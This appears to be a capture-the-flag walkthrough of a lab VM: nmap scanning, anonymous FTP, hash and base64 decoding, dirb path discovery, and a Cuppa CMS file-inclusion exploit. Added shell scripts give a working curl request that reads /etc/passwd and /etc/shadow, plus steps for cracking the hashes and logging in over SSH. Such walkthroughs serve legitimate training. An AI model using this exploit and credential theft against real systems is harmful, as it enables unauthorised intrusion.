1. Nmap Scan
1. Scan the local network before the target machine is powered on, to see which hosts are already there (the target's IP is not known yet):
sudo nmap -sn 192.168.134.0/24
Now power on the target machine and scan again; one additional IP shows up: 192.168.134.130
This is the target IP.
2. Use this IP to see what other information we can get from the target:
sudo nmap -sT -sV -O 192.168.134.130
Ports 21, 22, 80 and 3306 are open, each running a service. That covers TCP; check UDP as well:
sudo nmap -sU 192.168.134.130
No UDP ports are open, so UDP can be ignored. (A full UDP scan is slow; if it drags on, limit it with --top-ports.) Now that we know which ports are open, step into them: run the default scripts and version detection against just those ports to get more information:
sudo nmap -sT -sC -sV -O -p21,22,80,3306 192.168.134.130
This is the heaviest scan of the three (default NSE scripts plus version and OS detection), which is why it is limited to the ports already known to be open.
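The two things read off the scans by eye above (which host appeared between the sweeps, which TCP ports are open) can be pulled out of nmap's grepable output instead. The helpers below are an added example, not part of the original write-up; they assume the same scans were run with an extra `-oG <file>`, and the three sample files are constructed to match the results above rather than captured from the target.

```sh
#!/bin/sh
# Added example, not from the original write-up. Parses nmap grepable (-oG)
# output: a before/after "-sn" sweep to find the newly booted host, and a
# service scan to build the "-p" list for the heavier follow-up scan.
# All sample data below is constructed, not captured from the target.

# Hosts reported "Status: Up" in an "nmap -sn -oG" file.
up_hosts() {
    awk '/Status: Up/ { print $2 }' "$1"
}

# Hosts up in the second sweep but not in the first: the VM powered on
# between the two scans. comm needs sorted input, so both lists go through sort.
new_hosts() {
    t1=$(mktemp)
    t2=$(mktemp)
    up_hosts "$1" | sort > "$t1"
    up_hosts "$2" | sort > "$t2"
    comm -13 "$t1" "$t2"
    rm -f "$t1" "$t2"
}

# Open TCP ports from an "nmap -oG" service scan as a comma list for "-p".
# Each Ports entry is port/state/proto/owner/service/rpc/version; entries are
# comma separated, and the last one may be followed by "Ignored State: ...",
# which lands in the version field and is simply not looked at.
open_ports() {
    grep 'Ports:' "$1" \
      | sed 's/.*Ports: //' \
      | tr ',' '\n' \
      | awk -F/ '$2 == "open" && $3 == "tcp" { printf "%s%d", sep, $1; sep = "," }
                 END { print "" }'
}

# Constructed sample files, laid out the way nmap writes -oG output.
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
printf 'Host: 192.168.134.1 ()\tStatus: Up\nHost: 192.168.134.2 ()\tStatus: Up\n' > "$WORK/before.gnmap"
printf 'Host: 192.168.134.1 ()\tStatus: Up\nHost: 192.168.134.2 ()\tStatus: Up\nHost: 192.168.134.130 ()\tStatus: Up\n' > "$WORK/after.gnmap"
printf 'Host: 192.168.134.130 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 25/filtered/tcp//smtp///, 80/open/tcp//http///, 3306/open/tcp//mysql///\tIgnored State: closed (995)\n' > "$WORK/services.gnmap"

TARGET=$(new_hosts "$WORK/before.gnmap" "$WORK/after.gnmap")
PORTS=$(open_ports "$WORK/services.gnmap")
echo "new host: $TARGET"        # 192.168.134.130
echo "open tcp ports: $PORTS"   # 21,22,80,3306 (the filtered 25 is dropped)
echo "next: sudo nmap -sT -sC -sV -O -p$PORTS $TARGET"
```

The filtered port in the sample is there on purpose: `-oG` lists filtered ports alongside open ones, and feeding them into `-p` only wastes time on the scripted scan.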
2. Look into the ports
1. FTP
The service scan shows this FTP server allows
anonymous
login, so log in as the user anonymous (any password is accepted) and download the files. Those files contain the info below.
The string
01ec2d8fc11c493b25029fb1f47f39ce
is obviously hashed or encoded, but the algorithm can't be identified by eye, so use hash-identifier
to classify it. It identifies the string as MD5 (32 hex digits; MD4 and NTLM hashes have the same shape, so this is a best guess until a lookup confirms it). MD5 can't be reversed, but an unsalted MD5 of a short string is easy to look up, so the next step is an online MD5 lookup.
The lookup gives:
01ec2d8fc11c493b25029fb1f47f39ce:This is not a password
Next,
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
is base64 (the character set and the trailing == padding give it away); decoding it gives: It is easy, but not that easy..
Write down the other info from the files in case it turns out to be useful later.
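The two checks above (hash-identifier, then an online MD5 lookup, then base64 decoding) can also be done locally. The script below is an added example, not part of the original write-up; the two strings are the ones found on the FTP share, the plaintext it tests at the end is the one the online lookup returned, and it assumes GNU coreutils (`base64 -d`, `md5sum`).

```sh
#!/bin/sh
# Added example, not from the original write-up. Classifies the two strings
# from the FTP share by shape, decodes the base64 one, and confirms the
# online MD5 lookup result offline by rehashing the candidate plaintext.

# Classify a token by its shape, the way hash-identifier does (with a much
# shorter table). 32 hex digits is the MD5 shape, but MD4 and NTLM hashes have
# the same length, so this is a guess until a lookup or rehash confirms it.
# The hex test runs first because hex digits are also valid base64 characters.
classify() {
    if printf '%s' "$1" | grep -Eq '^[0-9a-fA-F]{32}$'; then
        echo md5-like
    elif printf '%s' "$1" | grep -Eq '^([A-Za-z0-9+/]{4})*([A-Za-z0-9+/]{4}|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==)$'; then
        echo base64-like
    else
        echo unknown
    fi
}

# Decode base64. printf '%s' avoids feeding the decoder a trailing newline.
decode_b64() {
    printf '%s' "$1" | base64 -d
}

# Confirm a lookup result offline: hash the candidate and compare. printf '%s'
# matters here too, since "echo" would hash the string plus a newline and the
# digest would not match.
md5_matches() {
    [ "$(printf '%s' "$2" | md5sum | cut -d' ' -f1)" = "$1" ]
}

HASH=01ec2d8fc11c493b25029fb1f47f39ce
B64=SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==

echo "$HASH -> $(classify "$HASH")"     # md5-like
echo "$B64 -> $(classify "$B64")"       # base64-like
echo "decoded: $(decode_b64 "$B64")"    # It is easy, but not that easy..
if md5_matches "$HASH" "This is not a password"; then
    echo "lookup result confirmed: MD5('This is not a password') = $HASH"
else
    echo "lookup result does not match; check for trailing whitespace or a different algorithm"
fi
```

The rehash step is the part worth keeping: an online lookup can return a plaintext for a different algorithm with the same digest length, and a one-line `md5sum` settles it before anything is built on the result.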
2. HTTP
Port 80 is open.
Use
dirb
to brute-force paths. It finds a useful one: http://192.168.134.130/administrator/installation/
The site is running Cuppa CMS, so search whether this software has a known vulnerability:
searchsploit cuppa CMS
There is a hit. Trying it as written doesn't work at first,
so open the software link in the exploit entry to see the practical proof-of-concept code.
That version sends the request with the POST method instead of GET, so resend the request as a POST and try again.
passwd:
Nice! The same request with /etc/shadow in place of /etc/passwd returns the shadow file as well.
Strip the entries that have no real hash (second field * or !, i.e. locked or system accounts) before cracking, so the cracker only spends time on real hashes.
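The fetch-and-filter steps above, as an added example that is not part of the original write-up. It assumes, since dirb found the installation directory under /administrator/, that Cuppa is installed there, so the vulnerable script is /administrator/alerts/alertConfigField.php with the urlConfig parameter (both taken from the exploit-db entry, EDB-ID 25971, which sends it in a POST body); the passwd/shadow pair it filters is constructed with placeholder hashes, not the target's data.

```sh
#!/bin/sh
# Added example, not from the original write-up. Two helpers for the steps
# above: reading a file through the Cuppa CMS file-inclusion bug with a POST
# request (as the exploit-db proof of concept does), and reducing a retrieved
# passwd/shadow pair to the accounts that actually carry a password hash, in
# the user:hash:uid:gid:gecos:home:shell layout john's unshadow produces.
#
# Assumptions (mine): Cuppa lives under /administrator/ on the target, so the
# vulnerable script is /administrator/alerts/alertConfigField.php and the
# parameter is urlConfig, both from the exploit-db entry. The sample files
# below are constructed with placeholder hashes; they are not the target's.

TARGET=${TARGET:-http://192.168.134.130}

# Read an absolute path on the target through the LFI. The parameter goes in
# the POST body, which is what made the attempt work above. Extra "../" past
# the filesystem root are harmless, so over-shoot rather than count levels.
lfi_read() {
    curl -s --data-urlencode "urlConfig=../../../../../../../..$1" \
        "$TARGET/administrator/alerts/alertConfigField.php"
}

# Merge passwd and shadow like unshadow, keeping only accounts whose shadow
# field is a crypt(3) hash ("$id$salt$hash"). A "*", "!" or "!!" field is a
# locked or password-less account and only wastes cracker time.
unshadow_hashed() {
    awk -F: -v OFS=: '
        NR == FNR { if ($2 ~ /^\$[0-9a-zA-Z]+\$/) hash[$1] = $2; next }  # shadow first
        $1 in hash { $2 = hash[$1]; print }                              # then passwd
    ' "$2" "$1"
}

# Constructed sample: one root, one system account, one normal user.
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
cat > "$WORK/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash
EOF
cat > "$WORK/shadow" <<'EOF'
root:$6$saltsalt$PLACEHOLDERHASHNOTREALxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:18000:0:99999:7:::
daemon:*:17500:0:99999:7:::
alice:$6$saltsalt$PLACEHOLDERHASHNOTREALyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy:18000:0:99999:7:::
EOF

# Against the real target the two files would come from:
#   lfi_read /etc/passwd > passwd
#   lfi_read /etc/shadow > shadow
unshadow_hashed "$WORK/passwd" "$WORK/shadow" > "$WORK/crackme"
cat "$WORK/crackme"
echo "accounts worth cracking: $(awk -F: '{ print $1 }' "$WORK/crackme" | tr '\n' ' ')"
# then, e.g.: john --wordlist=/usr/share/wordlists/rockyou.txt "$WORK/crackme"
```

Note that the LFI response comes back wrapped in whatever HTML the script emits, so when piping `lfi_read` output into a file for cracking, check that only the colon-separated lines survived; the awk filter above will silently drop any line whose second field is not a hash, which hides that kind of damage.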
Here are the account name and password!
Try to ssh in with them.
Completed.